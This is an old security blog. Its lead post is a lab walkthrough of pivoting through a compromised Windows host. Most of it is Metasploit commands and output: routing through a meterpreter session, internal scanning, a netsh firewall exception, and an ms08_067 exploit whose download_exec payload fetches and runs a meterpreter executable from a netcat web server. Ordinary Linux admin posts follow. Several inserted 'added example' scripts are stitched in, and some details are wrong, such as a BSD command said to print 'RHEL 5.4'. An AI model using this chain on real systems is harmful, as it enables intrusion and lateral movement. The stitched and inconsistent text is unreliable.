
Sunday, November 28, 2010

[n|u Delhi Presentations] Post exploitation techniques...

There was a presentation on "Post exploitation techniques using msf-nc kungfu" at the null monthly meet.
So here is a post about the presentation and the things I may have missed.

Aim:
There is a compromised machine in a network and you want to find and target other nodes inside that network.

Scenario:
The attacker runs BackTrack and sits outside the network. Machine A (the pivot) and machine B are behind the NAT.



So here we go with the meterpreter session on pivot machine:

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:1e:d3:76
IP Address : 192.168.74.128
Netmask : 255.255.255.0


meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.74.2
127.0.0.0 255.0.0.0 127.0.0.1
192.168.74.0 255.255.255.0 192.168.74.128
192.168.74.128 255.255.255.255 127.0.0.1
192.168.74.255 255.255.255.255 192.168.74.128
224.0.0.0 240.0.0.0 192.168.74.128
255.255.255.255 255.255.255.255 192.168.74.128

meterpreter >

1. Pass the traffic for the desired subnet through the meterpreter session:
In order to run scans and other Metasploit modules against the internal network, we need to add a route so that traffic for that subnet is sent through the meterpreter session.
Let's see how we can do that...

Back on the multi/handler...

msf exploit(handler) > route add 192.168.74.0 255.255.255.0 1
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.74.0 255.255.255.0 Session 1

msf exploit(handler) >

So now the network traffic meant for subnet 192.168.74.0/24 would be routed through meterpreter session 1.

2. Enumerate the nodes inside the network:
We will use the meterpreter script arp_scanner to scan the network.

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run arp_scanner -h
Meterpreter Script for performing an ARPS Scan Discovery.

OPTIONS:

-h Help menu.
-i Enumerate Local Interfaces
-r The target address range or CIDR identifier
-s Save found IP Addresses to logs.


meterpreter > run arp_scanner -r 192.168.74.0/24
[*] ARP Scanning 192.168.74.0/24
[*] IP: 192.168.74.1 MAC 0:50:56:c0:0:8
[*] IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5
[*] IP: 192.168.74.128 MAC 0:c:29:1e:d3:76
[*] IP: 192.168.74.129 MAC 0:c:29:7e:bd:74
[*] IP: 192.168.74.254 MAC 0:50:56:e5:a:b0
meterpreter >


Ok. As you can see, 5 IP addresses appear to be alive in the network.
The addresses 192.168.74.1, 192.168.74.2 and 192.168.74.254 belong to VMware Workstation's virtual network adapters.
They are distributed like this:
192.168.74.2 - gateway IP address for virtual machines behind NAT
192.168.74.1 - external IP address (vmnet8)
192.168.74.254 - DHCP server for virtual machines behind NAT

So, apart from all that, there is one more virtual machine which can be of interest to us.
Let's find out...



We will use the tcp portscan auxiliary module to find the open ports (checking some well-known ports only)...

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output

msf auxiliary(tcp) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf auxiliary(tcp) > set PORTS 21,22,23,25,80,110,135,139,443,445
PORTS => 21,22,23,25,80,110,135,139,443,445
msf auxiliary(tcp) > run

[*] 192.168.74.129:139 - TCP OPEN
[*] 192.168.74.129:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Alright. So file sharing seems to be enabled on the target machine.
We will use the infamous ms08_067 exploit...

But now there is a problem choosing an appropriate payload.
- A bind shell payload can't be used, as we have no direct access to machine B. So even if machine B gets exploited and starts listening on the port specified by the payload, we won't be able to connect to it.
- Reverse connect payloads also can't be used, assuming the situation that machine B has no direct internet access.

So all I did was upload netcat and a custom file, which is an HTTP response with the meterpreter client executable appended (if the exploit succeeds, this executable reverse-connects to the multi/handler listening on the attacker's machine, which also confirms that the exploit worked).

Let's do that...

meterpreter > upload /tmp/netcat.exe /tmp/httpresponse-msf.cfg %temp%
[*] uploading : /tmp/netcat.exe -> %temp%
[*] uploaded : /tmp/netcat.exe -> %temp%\netcat.exe
[*] uploading : /tmp/httpresponse-msf.cfg -> %temp%
[*] uploaded : /tmp/httpresponse-msf.cfg -> %temp%\httpresponse-msf.cfg
meterpreter >

Ok.
So now we will start a small web server on the pivot machine using netcat, feeding it httpresponse-msf.cfg as the response (the file can have any extension).

meterpreter > execute -H -f cmd.exe -c -i
Process 256 created.
Channel 9 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>cd %temp%
cd %temp%

C:\DOCUME~1\user\LOCALS~1\Temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 080D-40BD

Directory of C:\DOCUME~1\user\LOCALS~1\Temp

12/05/2010 01:57 AM <DIR> .
12/05/2010 01:57 AM <DIR> ..
10/23/2009 07:30 PM 8,704 21227.mst
10/23/2009 07:30 PM 8,704 21ad2.mst
10/23/2009 07:30 PM 8,704 48f1e.mst
10/23/2009 07:30 PM 8,704 c833.mst
08/15/2009 02:54 AM 8,704 ff21.mst
12/05/2010 01:57 AM 74,144 httpresponse-msf.cfg
12/05/2010 01:57 AM 61,440 netcat.exe
10/23/2009 07:30 PM 33,709 vminst.log_20091023_193054.log
06/10/2010 11:06 AM 41,986 vminst.log_20100610_110602.log
09/24/2010 12:47 PM 45,686 vminst.log_20100924_124718.log
09/28/2010 04:41 PM 45,537 vminst.log_20100928_164134.log
11/29/2010 03:53 PM 45,537 vminst.log_20101129_155316.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054_Failed.log
06/10/2010 11:06 AM 2,958,144 vmmsi.log_20100610_110601.log
09/24/2010 12:47 PM 3,008,988 vmmsi.log_20100924_124718.log
09/28/2010 04:41 PM 2,960,554 vmmsi.log_20100928_164134.log
11/29/2010 03:53 PM 2,958,778 vmmsi.log_20101129_155316.log
11/29/2010 03:54 PM <DIR> VMwareDnD
18 File(s) 17,424,123 bytes
3 Dir(s) 40,819,601,408 bytes free

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>




Oops. Looks like somebody is interfering with our business.
The firewall on the pivot machine can block opening a port in listening mode.
But we have access to this machine, and here is how we can add an exception to the firewall...

C:\DOCUME~1\user\LOCALS~1\Temp>netsh firewall set portopening tcp 80 nc enable all
netsh firewall set portopening tcp 80 nc enable all
Ok.


C:\DOCUME~1\user\LOCALS~1\Temp>


Ok. So now we were able to open port 80 and enable it for listening.
Alright, so let's run netcat once again as we did before.

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>exit
exit
^C
Terminate channel 9? [y/N] y
meterpreter >

All set. Now set the parameters and run ms08_067 for machine B...

meterpreter > background
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.74.129
RHOST => 192.168.74.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf exploit(ms08_067_netapi) > set URL http://192.168.74.128/
URL => http://192.168.74.128/
msf exploit(ms08_067_netapi) > show options
Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.74.129 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/download_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
URL http://192.168.74.128/ yes The pre-encoded URL to the executable


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] 172.16.24.1:36593 Request received for /Af4IZ...
[*] 172.16.24.1:36593 Staging connection for target f4IZ received...
[*] Patching Target ID f4IZ into DLL
[*] 172.16.24.1:45245 Request received for /Bf4IZ...
[*] 172.16.24.1:45245 Stage connection for target f4IZ received...
[*] Meterpreter session 2 opened (172.16.24.130:443 -> 172.16.24.1:45245) at 2010-12-04 20:57:45 +0000

msf exploit(ms08_067_netapi) >

Here we go...
As we can see, the exploit was successful and it opened meterpreter session 2, connecting back to the attacker's machine.

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINXP 172.16.24.130:443 -> 172.16.24.1:45245

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:7e:bd:74
IP Address : 192.168.74.129
Netmask : 255.255.255.0


meterpreter >
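From the defender's side, the arp_scanner run above is loud: a single host asks the whole /24 "who-has" within a few seconds. The script below is an added example (not from the presentation or this post) that counts distinct ARP request targets per sender over constructed tcpdump-style lines and reports any sender above a threshold; the MACs and IPs in the sample only reuse the values from the session output above as sample data.

```shell
#!/bin/sh
# Added example: flag hosts that ARP-probe many distinct addresses (an ARP sweep).
# The sample is constructed in the layout of `tcpdump -e -n arp`; it is not a real capture.
ARP_SAMPLE='00:0c:29:1e:d3:76 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.74.1 tell 192.168.74.128, length 28
00:0c:29:1e:d3:76 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.74.2 tell 192.168.74.128, length 28
00:0c:29:1e:d3:76 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.74.3 tell 192.168.74.128, length 28
00:0c:29:1e:d3:76 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.74.3 tell 192.168.74.128, length 28
00:0c:29:1e:d3:76 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.74.4 tell 192.168.74.128, length 28
00:0c:29:1e:d3:76 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.74.5 tell 192.168.74.128, length 28
00:0c:29:1e:d3:76 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.74.129 tell 192.168.74.128, length 28
00:50:56:c0:00:08 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.74.128 tell 192.168.74.1, length 28
00:0c:29:7e:bd:74 > 00:0c:29:1e:d3:76, ethertype ARP (0x0806), length 42: Reply 192.168.74.129 is-at 00:0c:29:7e:bd:74, length 28'

# arp_sweep_sources THRESHOLD  < tcpdump-lines
# Prints "sender_ip distinct_targets" for every sender that asked about at least
# THRESHOLD different addresses. Repeated requests for the same target count once,
# and ARP replies are ignored.
arp_sweep_sources() {
  awk -v thr="$1" '
    /Request who-has/ {
      for (i = 1; i <= NF; i++) {
        if ($i == "who-has") target = $(i + 1)
        if ($i == "tell")    { sender = $(i + 1); sub(/,$/, "", sender) }
      }
      key = sender SUBSEP target
      if (!(key in seen)) { seen[key] = 1; count[sender]++ }
    }
    END { for (s in count) if (count[s] >= thr) print s, count[s] }
  ' | sort
}

# Demo: a threshold of 5 singles out the sweeping host; the normal host asked about one address.
printf '%s\n' "$ARP_SAMPLE" | arp_sweep_sources 5
```

On a real capture, feed `tcpdump -e -n -l arp` into the function and tune the threshold to the size of the segment.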



..............Done!!!

Thursday, November 18, 2010

SSH to server without any password...

You want access to an SSH server and don't wish to enter the password every time you connect to it. This can be the case for someone using scp very frequently to copy multiple files from server to client or vice versa.

Scenario: User a on host A (client) wants to access host B (server), which has an SSH server (OpenSSH) running on it, with the access-without-password feature. :-)

Steps:

a@ubuntu_A:~$ ssh-keygen -t rsa
a@ubuntu_A:~$ ssh b@ubuntu_B mkdir -p .ssh
a@ubuntu_A:~$ cat .ssh/id_rsa.pub | ssh b@ubuntu_B 'cat >> .ssh/authorized_keys2'
b@ubuntu_B's password:
a@ubuntu_A:~$
a@ubuntu_A:~$ ssh b@ubuntu_B

Last login: Thu Nov 18 09:48:06 2010 from 192.168.1.102
b@ubuntu_B:~$

OR

I just came across this alternative... check this out:
a@ubuntu_A:~$ ssh-copy-id b@ubuntu_B
b@ubuntu_B's password:
a@ubuntu_A:~$ ssh b@ubuntu_B

Last login: Thu Nov 18 09:48:06 2010 from 192.168.1.102
b@ubuntu_B:~$
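One caveat worth checking on the server side: sshd's StrictModes (on by default) refuses to use authorized_keys when the home directory, .ssh or the key file is writable by group or others, and the login silently falls back to a password prompt. The function below is an added example, not part of the post; it assumes GNU coreutils (stat -c) and checks those modes for a given home directory.

```shell
#!/bin/sh
# Added example: verify the file modes sshd's StrictModes requires before it honours
# ~/.ssh/authorized_keys (or the older authorized_keys2 name the post appends to).
# Assumes GNU stat; not part of the original post.

# check_ssh_key_perms HOME_DIR  -> returns 0 if every mode is acceptable, 1 otherwise
check_ssh_key_perms() {
  home=$1
  rc=0
  for path in "$home" "$home/.ssh" "$home/.ssh/authorized_keys" "$home/.ssh/authorized_keys2"; do
    [ -e "$path" ] || continue           # both key-file names are optional
    perm=$(stat -c '%a' "$path")         # octal mode, e.g. 755, 700, 600
    other=${perm#${perm%?}}              # last digit: "other" bits
    rest=${perm%?}
    group=${rest#${rest%?}}              # second-to-last digit: "group" bits
    if [ $(( group & 2 )) -ne 0 ] || [ $(( other & 2 )) -ne 0 ]; then
      echo "bad mode $perm on $path: must not be group/other writable" >&2
      rc=1
    fi
    case "$path" in
      */authorized_keys*)
        # Readable-by-others is not a StrictModes failure, but 600 is the convention.
        if [ $(( group & 4 )) -ne 0 ] || [ $(( other & 4 )) -ne 0 ]; then
          echo "note: $path is readable by others; chmod 600 is conventional" >&2
        fi ;;
    esac
  done
  return $rc
}

# Demo against the current user's home directory.
check_ssh_key_perms "${HOME:-/tmp}" && echo "authorized_keys modes OK"
```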

References:
http://linuxproblem.org/art_9.html
http://www.csua.berkeley.edu/~ranga/notes/ssh_nopass.html

..............Done!!!

Monday, September 27, 2010

Install 32 bit application on 64 bit Ubuntu...

In many cases you may need to install a 32 bit application in a 64 bit OS environment.
I faced this problem when I had to install Google Earth on my Ubuntu Lucid Lynx 64 bit OS.

ubuntu@localhost:~$ sudo ./GoogleEarthLinux-5.1.bin
[sudo] password for ubuntu:
Verifying archive integrity... All good.
Uncompressing Google Earth for GNU/Linux 5.1.3535.3218...............................................................
setup.data/bin/Linux/amd64/setup.gtk2: error while loading shared libraries: libxml2.so.2: cannot open shared object file: No such file or directory
setup.data/bin/Linux/amd64/setup.gtk: error while loading shared libraries: libSM.so.6: cannot open shared object file: No such file or directory
The setup program seems to have failed on amd64

Fatal error, installer failed to run at all!
ubuntu@localhost:~$


To fix this, all you need to do is install ia32-libs, and we are good to go.

ubuntu@localhost:~$ sudo apt-get install ia32-libs

There are other ways, though, to make 32 bit applications run on a 64 bit OS.
Refer to this link for more options.

..............Done!!!

Tuesday, September 21, 2010

[Howto] Install Origami on Ubuntu...

Origami: a parser and analyzer for PDF documents.
Install Ruby and the required dependencies with one all-in-one command...

ubuntu@localhost:~$ sudo apt-get install ruby libgtk2-ruby libopenssl-ruby libssl-dev openssl

..............Done!!!

Monday, July 12, 2010

Share folders on an Ubuntu server through the CLI...

Change the Samba configuration file located at /etc/samba/smb.conf as follows...
i. For authentication-based access, append...
[private]
comment = Private Share
path = /tmp/pri-share
browseable = no
read only = no

ii. For anonymous read-only access, append...
[public]
comment = Public Share
path = /tmp/pub-share
read only = yes   ; guests may read but not write
guest only = yes
guest ok = yes
Be sure, while accessing the shares from either a Windows or a Linux box, to use 'private' or 'public' as the share names instead of 'pri-share' and 'pub-share'.

e.g. \\192.168.1.10\private
smb://192.168.1.10/private


..............Done!!!

Tuesday, July 6, 2010

Python tools for penetration testers...

Found this list (in a blog post by Dirk Loss) very interesting; it may help a pen-tester...
Enjoy...

http://dirk-loss.de/python-tools.htm

Thursday, June 24, 2010

Install Apache, PHP and MySQL(all in one shot), on Ubuntu server...

This will help you set up an Ubuntu server as a LAMP stack (L-Linux, A-Apache, M-MySQL and P-PHP). Follow the steps:

1. For PHP5, install Apache, MySQL and PHP5 alongside the necessary modules with the following commands.

root@localhost:~# apt-get install apache2 php5 libapache2-mod-php5


root@localhost:~# apt-get install mysql-server mysql-client libapache2-mod-auth-mysql php5-mysql


2. For PHP4...

root@localhost:~# apt-get install apache2 php4 libapache2-mod-php4


root@localhost:~# apt-get install mysql-server mysql-client libapache2-mod-auth-mysql php4-mysql


..............Done!!!

Tuesday, June 1, 2010

Add script to run at bootup in Ubuntu...

Steps as follows:
1. First of all, give your script file executable permissions.
user@localhost:~$ chmod +x script-file.sh


2. Move your script file to the /etc/init.d directory.
user@localhost:~$ sudo mv script-file.sh /etc/init.d


3. Update the init script links by running the following command:
user@localhost:~$ sudo update-rc.d script-file.sh defaults

Remember, these steps make a script run at bootup, NOT AT LOGIN.

If you append your commands to the ".bashrc" file instead, they will be executed whenever that particular user logs in.

There is a difference.
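The steps above assume script-file.sh already looks like an init script. The following is an added example, not from the post, of the shape such a file needs: update-rc.d reads the LSB header block to order the runlevel links (newer Ubuntu releases warn without it), and a start/stop/status dispatch keeps the script usable from the service tooling. The daemon command and pidfile path are placeholders.

```shell
#!/bin/sh
# Added example (not from the post): a minimal /etc/init.d script that
# `update-rc.d script-file.sh defaults` can order via the LSB header below.
### BEGIN INIT INFO
# Provides:          script-file
# Required-Start:    $remote_fs $syslog
# Required-Stop:     $remote_fs $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: example boot-time service
### END INIT INFO

PIDFILE=${PIDFILE:-/tmp/script-file.pid}   # placeholder; a real service uses /var/run
DAEMON_CMD="sleep 3600"                      # placeholder for the real long-running command

# is_running -> 0 if the pidfile names a live process
is_running() {
  [ -f "$PIDFILE" ] && kill -0 "$(cat "$PIDFILE")" 2>/dev/null
}

do_start() {
  if is_running; then
    echo "already running (pid $(cat "$PIDFILE"))"
    return 0
  fi
  # Boot-time scripts run as root: drop to a service account here (for example with
  # start-stop-daemon --chuid) unless the job really needs root.
  $DAEMON_CMD &
  echo $! > "$PIDFILE"
}

do_stop() {
  is_running || return 0
  kill "$(cat "$PIDFILE")" && rm -f "$PIDFILE"
}

# Dispatch only when called with an action, so the functions can also be sourced.
case "${1:-}" in
  start)   do_start ;;
  stop)    do_stop ;;
  restart) do_stop; do_start ;;
  status)  if is_running; then echo running; else echo stopped; fi ;;
  '')      ;;
  *)       echo "Usage: $0 {start|stop|restart|status}" >&2; exit 1 ;;
esac
```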

..............Done!!!

Sunday, May 30, 2010

For your own security...

This was really a cool one...read it.

How security is important for your safety...lolz....funny :P


Thursday, May 20, 2010

Set up an FTP server (ProFTPD) on an Ubuntu box...

The steps are as follows:
1. Install the ProFTPD server
user@localhost:~$ sudo apt-get install proftpd

2. For security reasons, the ftp user shouldn't have direct shell access to the system. So we give the new user "/bin/false" as a shell. For ProFTPD to accept that as a valid shell, append "/bin/false" to the /etc/shells file. The append has to happen with root privileges, so tee is used (a plain "sudo echo >> /etc/shells" fails, because the redirection is done by the unprivileged shell).
user@localhost:~$ echo "/bin/false" | sudo tee -a /etc/shells

3. Create the ftp user with the shell pointed at /bin/false.
user@localhost:~$ sudo useradd -d <home-dir-path-ftp-user> -s /bin/false <ftp-username>

4. Set the password for the created user.
user@localhost:~$ sudo passwd <ftp-username>

5. Configure proftpd.conf according to your needs.
user@localhost:~$ sudo nano /etc/proftpd/proftpd.conf


..............Done!!!

Friday, May 7, 2010

[TOOL] TMAC for Linux...

TMAC is a simple bash program written for the purpose of changing the MAC address of a Network Interface Card (NIC) on a Linux based system, provided it has a Bash environment.

This tool changes the MAC address of a Network Interface Card (NIC) in Linux by choosing a randomly generated MAC address. The chosen MAC address is randomised in the following way:
- Its first 3 octets are taken from the list of MAC vendors provided by IEEE, which can be found here.
- The remaining 3 octets are completely random hexadecimal numbers obtained with the help of the system's pseudo-random generator variable.

All it needs is a Linux machine with a BASH shell environment.

Looking at the subject, many people would already be saying "What the heck? Why do I need a MAC address changer for my Linux, when I already have a one-command solution for that? It's so simple...

user@localhost:~$ sudo ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx

See? It's done."

But isn't that a pain when you have to do the same thing every time you log in to your system?
The response I would expect is "What crap? All I need to do is put that command in $HOME/.bashrc. It's as simple as that."

Now, what if you want to randomize it each and every time you log in to your system?
"mmm... [:-/] "
And what if you are setting the MAC address of your NIC to some random hex chars whose vendor is still to be born on this earth?
"mmm... [:-/] "

So the purpose of making this tool was to generate a random MAC address from a KNOWN MAC vendors list and assign it to the specified device.
That is why, effectively, it needs 2 files to work: a text file containing the list of MAC vendors, used "AS IS" from IEEE's website, and the bash program itself.

Also, there can be a question like "Why on earth do I ever need to change my MAC address?"
I would ask those with this question in mind to go through this link.

Well, Google anyway knows a lot about you and me.

Moreover, if you want to make this tool run each time you log in and randomize your MAC address, I would suggest appending the command 'bash $PWD/tmac.sh -R' to the '$HOME/.bashrc' file.

Windows users must already know about TMAC, the Technitium MAC Address Changer. More info.

Download tmac-v1.0.tar.gz.
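The two-part scheme described above (vendor OUI plus three random octets) in working form, as an added example that is not TMAC's own code: the OUI list is a constructed three-entry excerpt in the layout of IEEE's oui.txt, the random bytes come from /dev/urandom, and GNU od/awk/sed are assumed. The generated address is validated as a unicast MAC before it would be applied.

```shell
#!/bin/sh
# Added example, not TMAC's own code: first three octets from a vendor (OUI) list,
# last three random, then a sanity check. Assumes GNU od/awk/sed and /dev/urandom.

# Constructed excerpt in the oui.txt layout, used only as sample data.
OUI_SAMPLE='00-0C-29   (hex)        VMware, Inc.
00-50-56   (hex)        VMware, Inc.
00-1B-21   (hex)        Intel Corporate'

# random_vendor_mac OUI_FILE -> prints one lowercase colon-separated MAC
random_vendor_mac() {
  total=$(grep -c '(hex)' "$1")
  [ "$total" -gt 0 ] || { echo "no OUI entries in $1" >&2; return 1; }
  r=$(od -An -N2 -tu2 /dev/urandom | tr -d ' ')        # random 16-bit index seed
  idx=$(( r % total + 1 ))
  oui=$(grep '(hex)' "$1" | sed -n "${idx}p" | awk '{print tolower($1)}' | tr '-' ':')
  nic=$(od -An -N3 -tx1 /dev/urandom | tr -s ' ' ':' | sed 's/^://')   # "3f:a2:01" style
  printf '%s:%s\n' "$oui" "$nic"
}

# is_valid_unicast_mac MAC -> 0 if six hex octets and the I/G bit of the first octet is clear
is_valid_unicast_mac() {
  printf '%s' "$1" | grep -Eq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$' || return 1
  case "${1%%:*}" in ?[02468ace]) return 0 ;; *) return 1 ;; esac
}

# Demo: write the sample list to a temp file and generate one address.
f=$(mktemp); printf '%s\n' "$OUI_SAMPLE" > "$f"
mac=$(random_vendor_mac "$f")
is_valid_unicast_mac "$mac" && echo "generated $mac"
rm -f "$f"
# Applying it needs root; on current Linux the ip(8) form replaces the deprecated ifconfig:
#   ip link set dev wlan0 down && ip link set dev wlan0 address "$mac" && ip link set dev wlan0 up
```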

Tuesday, April 27, 2010

Upgrade the Linux kernel in Ubuntu...

I know Ubuntu 9.10 comes with 'Update Manager' by default.
But this can be helpful in case one wishes to upgrade or downgrade to a kernel of one's choice.

1. Check the current version of kernel on the system

user@localhost:~$ uname -a
Linux localhost 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 04:38:19 UTC 2010 x86_64 GNU/Linux

2. Search for the available supported kernels

user@localhost:~$ sudo apt-cache search linux-image
linux-image - Generic Linux kernel image.
linux-image-2.6.31-15-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-15-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-15-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-16-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-16-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-16-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-17-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-17-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-17-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-19-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-19-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-19-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-20-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-20-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-20-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-304-ec2 - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-305-ec2 - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-ec2 - Linux kernel image for ec2 machines
linux-image-generic - Generic Linux kernel image
linux-image-server - Linux kernel image on Server Equipment.
linux-image-virtual - Linux kernel image for virtual machines
alsa-base - ALSA driver configuration files
linux-image-2.6.31-14-generic - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-14-server - Linux kernel image for version 2.6.31 on x86_64
linux-image-2.6.31-14-virtual - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-302-ec2 - Linux kernel image for version 2.6.31 on x86/x86_64
linux-image-2.6.31-9-rt - Linux kernel image for version 2.6.31 on Ingo Molnar's full real time preemption patch
linux-image-rt - Rt Linux kernel image
rt2400-source - source for rt2400 wireless network driver
rt2500-source - source for rt2500 wireless network driver
rt2570-source - source for rt2570 wireless network driver
user@localhost:~$

3. Install the desired kernel

user@localhost:~$ sudo apt-get install linux-image-x.x.x-xx


..............Done!!!

Friday, April 16, 2010

Know what version of Linux distro you are on...

This will help you identify the operating system details in case you have only a shell prompt on a Linux machine.
Here is the command which will tell you what version and distribution of Linux you are on.

user@localhost:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.10
DISTRIB_CODENAME=interpid
DISTRIB_DESCRIPTION="Ubuntu 8.10"


In case of BSD, the command should be

user@localhost:~$ cat /etc/*version
RHEL 5.4



Furthermore, if you want to know the kernel version and other system information, this is the command that will do the job.

user@localhost:~$ uname -a
Linux localhost 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 04:38:19 UTC 2010 x86_64 GNU/Linux

..............Done!!!

Sunday, April 4, 2010

Bind multiple IPs to a single interface in Ubuntu...

I came across a situation where I had to assign more than one IP to a single interface on my Ubuntu host... so here is everything I did...

1. Back up the 'interfaces' file before you do something crappy to the original one :P
user@localhost:~$ sudo cp /etc/network/interfaces /root/interfaces.backup
user@localhost:~$



2. Edit the 'interfaces' file and change it like this (only the primary interface carries the default gateway; repeating the gateway line under the aliases makes ifup fail when it tries to add the same default route again)...
user@localhost:~$ sudo nano /etc/network/interfaces
user@localhost:~$ cat /etc/network/interfaces
auto eth0
auto eth0:0
auto eth0:1

iface eth0 inet static
address 192.168.1.1
netmask 255.255.255.248
gateway 192.168.1.254

iface eth0:0 inet static
address 192.168.1.2
netmask 255.255.255.248

iface eth0:1 inet static
address 192.168.1.3
netmask 255.255.255.248



Save it and close the file.

3. Restart the network service...
user@localhost:~$ sudo /etc/init.d/networking restart


..............Done!!!

Wednesday, March 31, 2010

[n|u Delhi Presentations] 27th March 2010...

There was a scheduled null meet on 27th March 2010 at IIT Delhi, where I, actually, was supposed to JUST attend the meet. In fact, I was a little excited to attend the presentation by Vishwas, who was going to deliver a live demonstration (actually, that's what I thought before coming to the meet [:(], but that doesn't matter) of IE8 being exploited on a Windows 7 machine with ASLR and DEP enabled. [:-o]

Yes, you heard it right!
This was done by Peter Vreugdenhil in pwn2own 2010 CanSecWest contest.

You may find the detailed report here.

Well, I just thought of showing a small live demonstration to clear up some very basic terms like a vulnerability and an exploit.
This can be a good start for those who are new to these terms.

A vulnerability is a loophole in a service.
An exploit is the penetration, i.e. doing something unusual (which is not supposed to be done by that service) by using the vulnerability.
As simple as it sounds :)

In the general scenario, an exploit is divided into two parts: the vulnerability exposure and the payload.

